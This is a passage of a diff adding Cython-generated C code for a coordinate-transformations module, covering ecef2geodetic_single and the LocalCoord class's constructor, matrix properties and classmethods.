__Pyx_AddTraceback("common.transformations.transformations.ecef2geodetic_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_20ecef2geodetic_single(__pyx_self, __pyx_v_ecef); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_20ecef2geodetic_single(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_ecef) { + struct ECEF __pyx_v_e; + struct Geodetic __pyx_v_g; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + struct ECEF __pyx_t_1; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("ecef2geodetic_single", 0); + + /* "common/transformations/transformations.pyx":110 + * + * def ecef2geodetic_single(ecef): + * cdef ECEF e = list2ecef(ecef) # <<<<<<<<<<<<<< + * cdef Geodetic g = ecef2geodetic_c(e) + * return [g.lat, g.lon, g.alt] + */ + __pyx_t_1 = __pyx_f_6common_15transformations_15transformations_list2ecef(__pyx_v_ecef); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 110, __pyx_L1_error) + __pyx_v_e = __pyx_t_1; + + /* "common/transformations/transformations.pyx":111 + * def ecef2geodetic_single(ecef): + * cdef ECEF e = list2ecef(ecef) + * cdef Geodetic g = ecef2geodetic_c(e) # <<<<<<<<<<<<<< + * return [g.lat, g.lon, g.alt] + * + */ + __pyx_v_g = ecef2geodetic(__pyx_v_e); + + /* "common/transformations/transformations.pyx":112 + * cdef ECEF e = list2ecef(ecef) + * cdef Geodetic g = ecef2geodetic_c(e) + * return [g.lat, g.lon, g.alt] # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_2 = PyFloat_FromDouble(__pyx_v_g.lat); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 112, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = PyFloat_FromDouble(__pyx_v_g.lon); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 112, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = PyFloat_FromDouble(__pyx_v_g.alt); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 112, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = PyList_New(3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 112, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_2); + PyList_SET_ITEM(__pyx_t_5, 0, __pyx_t_2); + __Pyx_GIVEREF(__pyx_t_3); + PyList_SET_ITEM(__pyx_t_5, 1, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_4); + PyList_SET_ITEM(__pyx_t_5, 2, __pyx_t_4); + __pyx_t_2 = 0; + __pyx_t_3 = 0; + __pyx_t_4 = 0; + __pyx_r = __pyx_t_5; + __pyx_t_5 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":109 + * return [e.x, e.y, e.z] + * + * def ecef2geodetic_single(ecef): # <<<<<<<<<<<<<< + * cdef ECEF e = list2ecef(ecef) + * cdef Geodetic g = ecef2geodetic_c(e) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_AddTraceback("common.transformations.transformations.ecef2geodetic_single", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":118 + * cdef LocalCoord_c * lc + * + * def __init__(self, geodetic=None, ecef=None): # <<<<<<<<<<<<<< + * assert (geodetic is not None) or (ecef is not None) + * if geodetic is not None: + */ + +/* Python wrapper */ +static int __pyx_pw_6common_15transformations_15transformations_10LocalCoord_1__init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_pw_6common_15transformations_15transformations_10LocalCoord_1__init__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_geodetic = 0; + PyObject *__pyx_v_ecef = 0; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__init__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_geodetic,&__pyx_n_s_ecef,0}; + PyObject* values[2] = {0,0}; + values[0] = ((PyObject *)Py_None); + values[1] = ((PyObject *)Py_None); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_geodetic); + if (value) { values[0] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 118, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 1: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_ecef); + if (value) { values[1] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 118, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__init__") < 0)) __PYX_ERR(0, 118, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_geodetic = values[0]; + __pyx_v_ecef = values[1]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__init__", 0, 0, 2, __pyx_nargs); __PYX_ERR(0, 118, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_10LocalCoord___init__(((struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *)__pyx_v_self), __pyx_v_geodetic, __pyx_v_ecef); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_pf_6common_15transformations_15transformations_10LocalCoord___init__(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self, PyObject *__pyx_v_geodetic, PyObject *__pyx_v_ecef) { + int __pyx_r; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + struct Geodetic __pyx_t_3; + struct ECEF __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__init__", 0); + + /* "common/transformations/transformations.pyx":119 + * + * def __init__(self, geodetic=None, ecef=None): + * assert (geodetic is not None) or (ecef is not None) # <<<<<<<<<<<<<< + * if geodetic is not None: + * self.lc = new LocalCoord_c(list2geodetic(geodetic)) + */ + #ifndef CYTHON_WITHOUT_ASSERTIONS + if (unlikely(__pyx_assertions_enabled())) { + __pyx_t_2 = (__pyx_v_geodetic != Py_None); + if (!__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L3_bool_binop_done; + } + __pyx_t_2 = (__pyx_v_ecef != Py_None); + __pyx_t_1 = __pyx_t_2; + __pyx_L3_bool_binop_done:; + if (unlikely(!__pyx_t_1)) { + __Pyx_Raise(__pyx_builtin_AssertionError, 0, 0, 0); + __PYX_ERR(0, 119, __pyx_L1_error) + } + } + #else + if ((1)); else __PYX_ERR(0, 119, __pyx_L1_error) + #endif + + /* "common/transformations/transformations.pyx":120 + * def __init__(self, geodetic=None, ecef=None): + * assert (geodetic is not None) or (ecef is not None) + * if geodetic is not None: # <<<<<<<<<<<<<< + * self.lc = new LocalCoord_c(list2geodetic(geodetic)) + * elif ecef is not None: + */ + __pyx_t_1 = (__pyx_v_geodetic != Py_None); + if (__pyx_t_1) { + + /* "common/transformations/transformations.pyx":121 + * assert (geodetic is not None) or (ecef is not None) + * if geodetic is not None: + * self.lc = new LocalCoord_c(list2geodetic(geodetic)) # <<<<<<<<<<<<<< + * elif ecef is not None: + * self.lc = new LocalCoord_c(list2ecef(ecef)) + */ + __pyx_t_3 = __pyx_f_6common_15transformations_15transformations_list2geodetic(__pyx_v_geodetic); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 121, __pyx_L1_error) + __pyx_v_self->lc = new LocalCoord(__pyx_t_3); + + /* "common/transformations/transformations.pyx":120 + * def __init__(self, geodetic=None, ecef=None): + * assert (geodetic is not None) or (ecef is not None) + * if geodetic is not None: # <<<<<<<<<<<<<< + * self.lc = new LocalCoord_c(list2geodetic(geodetic)) + * elif ecef is not None: + */ + goto __pyx_L5; + } + + /* "common/transformations/transformations.pyx":122 + * if geodetic is not None: + * self.lc = new LocalCoord_c(list2geodetic(geodetic)) + * elif ecef is not None: # <<<<<<<<<<<<<< + * self.lc = new LocalCoord_c(list2ecef(ecef)) + * + */ + __pyx_t_1 = (__pyx_v_ecef != Py_None); + if (__pyx_t_1) { + + /* "common/transformations/transformations.pyx":123 + * self.lc = new LocalCoord_c(list2geodetic(geodetic)) + * elif ecef is not None: + * self.lc = new LocalCoord_c(list2ecef(ecef)) # <<<<<<<<<<<<<< + * + * @property + */ + __pyx_t_4 = __pyx_f_6common_15transformations_15transformations_list2ecef(__pyx_v_ecef); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 123, __pyx_L1_error) + __pyx_v_self->lc = new LocalCoord(__pyx_t_4); + + /* "common/transformations/transformations.pyx":122 + * if geodetic is not None: + * self.lc = new LocalCoord_c(list2geodetic(geodetic)) + * elif ecef is not None: # <<<<<<<<<<<<<< + * self.lc = new LocalCoord_c(list2ecef(ecef)) + * + */ + } + __pyx_L5:; + + /* "common/transformations/transformations.pyx":118 + * cdef LocalCoord_c * lc + * + * def __init__(self, geodetic=None, ecef=None): # <<<<<<<<<<<<<< + * assert (geodetic is not None) or (ecef is not None) + * if geodetic is not None: + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.__init__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":125 + * self.lc = new LocalCoord_c(list2ecef(ecef)) + * + * @property # <<<<<<<<<<<<<< + * def ned2ecef_matrix(self): + * return matrix2numpy(self.lc.ned2ecef_matrix) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_15ned2ecef_matrix_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_15ned2ecef_matrix_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_15transformations_15transformations_10LocalCoord_15ned2ecef_matrix___get__(((struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_15ned2ecef_matrix___get__(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "common/transformations/transformations.pyx":127 + * @property + * def ned2ecef_matrix(self): + * return matrix2numpy(self.lc.ned2ecef_matrix) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = ((PyObject *)__pyx_f_6common_15transformations_15transformations_matrix2numpy(__pyx_v_self->lc->ned2ecef_matrix)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 127, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":125 + * self.lc = new LocalCoord_c(list2ecef(ecef)) + * + * @property # <<<<<<<<<<<<<< + * def ned2ecef_matrix(self): + * return matrix2numpy(self.lc.ned2ecef_matrix) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.ned2ecef_matrix.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":129 + * return matrix2numpy(self.lc.ned2ecef_matrix) + * + * @property # <<<<<<<<<<<<<< + * def ecef2ned_matrix(self): + * return matrix2numpy(self.lc.ecef2ned_matrix) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_15ecef2ned_matrix_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_15ecef2ned_matrix_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_15transformations_15transformations_10LocalCoord_15ecef2ned_matrix___get__(((struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_15ecef2ned_matrix___get__(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "common/transformations/transformations.pyx":131 + * @property + * def ecef2ned_matrix(self): + * return matrix2numpy(self.lc.ecef2ned_matrix) # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = ((PyObject *)__pyx_f_6common_15transformations_15transformations_matrix2numpy(__pyx_v_self->lc->ecef2ned_matrix)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 131, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":129 + * return matrix2numpy(self.lc.ned2ecef_matrix) + * + * @property # <<<<<<<<<<<<<< + * def ecef2ned_matrix(self): + * return matrix2numpy(self.lc.ecef2ned_matrix) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.ecef2ned_matrix.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":133 + * return matrix2numpy(self.lc.ecef2ned_matrix) + * + * @property # <<<<<<<<<<<<<< + * def ned_from_ecef_matrix(self): + * return self.ecef2ned_matrix + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_20ned_from_ecef_matrix_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_20ned_from_ecef_matrix_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_15transformations_15transformations_10LocalCoord_20ned_from_ecef_matrix___get__(((struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_20ned_from_ecef_matrix___get__(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "common/transformations/transformations.pyx":135 + * @property + * def ned_from_ecef_matrix(self): + * return self.ecef2ned_matrix # <<<<<<<<<<<<<< + * + * @property + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_ecef2ned_matrix); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 135, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":133 + * return matrix2numpy(self.lc.ecef2ned_matrix) + * + * @property # <<<<<<<<<<<<<< + * def ned_from_ecef_matrix(self): + * return self.ecef2ned_matrix + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.ned_from_ecef_matrix.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":137 + * return self.ecef2ned_matrix + * + * @property # <<<<<<<<<<<<<< + * def ecef_from_ned_matrix(self): + * return self.ned2ecef_matrix + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_20ecef_from_ned_matrix_1__get__(PyObject *__pyx_v_self); /*proto*/ +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_20ecef_from_ned_matrix_1__get__(PyObject *__pyx_v_self) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__get__ (wrapper)", 0); + __pyx_r = __pyx_pf_6common_15transformations_15transformations_10LocalCoord_20ecef_from_ned_matrix___get__(((struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_20ecef_from_ned_matrix___get__(struct __pyx_obj_6common_15transformations_15transformations_LocalCoord *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__get__", 0); + + /* "common/transformations/transformations.pyx":139 + * @property + * def ecef_from_ned_matrix(self): + * return self.ned2ecef_matrix # <<<<<<<<<<<<<< + * + * @classmethod + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(((PyObject *)__pyx_v_self), __pyx_n_s_ned2ecef_matrix); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 139, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":137 + * return self.ecef2ned_matrix + * + * @property # <<<<<<<<<<<<<< + * def ecef_from_ned_matrix(self): + * return self.ned2ecef_matrix + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.ecef_from_ned_matrix.__get__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":141 + * return self.ned2ecef_matrix + * + * @classmethod # <<<<<<<<<<<<<< + * def from_geodetic(cls, geodetic): + * return cls(geodetic=geodetic) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_3from_geodetic(PyObject *__pyx_v_cls, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_10LocalCoord_3from_geodetic = {"from_geodetic", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_10LocalCoord_3from_geodetic, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_3from_geodetic(PyObject *__pyx_v_cls, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_geodetic = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("from_geodetic (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_geodetic,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_geodetic)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 141, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "from_geodetic") < 0)) __PYX_ERR(0, 141, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v_geodetic = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("from_geodetic", 1, 1, 1, __pyx_nargs); __PYX_ERR(0, 141, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.from_geodetic", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_15transformations_15transformations_10LocalCoord_2from_geodetic(((PyTypeObject*)__pyx_v_cls), __pyx_v_geodetic); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_15transformations_15transformations_10LocalCoord_2from_geodetic(PyTypeObject *__pyx_v_cls, PyObject *__pyx_v_geodetic) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("from_geodetic", 0); + + /* "common/transformations/transformations.pyx":143 + * @classmethod + * def from_geodetic(cls, geodetic): + * return cls(geodetic=geodetic) # <<<<<<<<<<<<<< + * + * @classmethod + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 143, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + if (PyDict_SetItem(__pyx_t_1, __pyx_n_s_geodetic, __pyx_v_geodetic) < 0) __PYX_ERR(0, 143, __pyx_L1_error) + __pyx_t_2 = __Pyx_PyObject_Call(((PyObject *)__pyx_v_cls), __pyx_empty_tuple, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 143, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_r = __pyx_t_2; + __pyx_t_2 = 0; + goto __pyx_L0; + + /* "common/transformations/transformations.pyx":141 + * return self.ned2ecef_matrix + * + * @classmethod # <<<<<<<<<<<<<< + * def from_geodetic(cls, geodetic): + * return cls(geodetic=geodetic) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_AddTraceback("common.transformations.transformations.LocalCoord.from_geodetic", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/transformations/transformations.pyx":145 + * return cls(geodetic=geodetic) + * + * @classmethod # <<<<<<<<<<<<<< + * def from_ecef(cls, ecef): + * return cls(ecef=ecef) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_5from_ecef(PyObject *__pyx_v_cls, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_15transformations_15transformations_10LocalCoord_5from_ecef = {"from_ecef", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_15transformations_15transformations_10LocalCoord_5from_ecef, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_15transformations_15transformations_10LocalCoord_5from_ecef(PyObject *__pyx_v_cls, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_ecef = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + 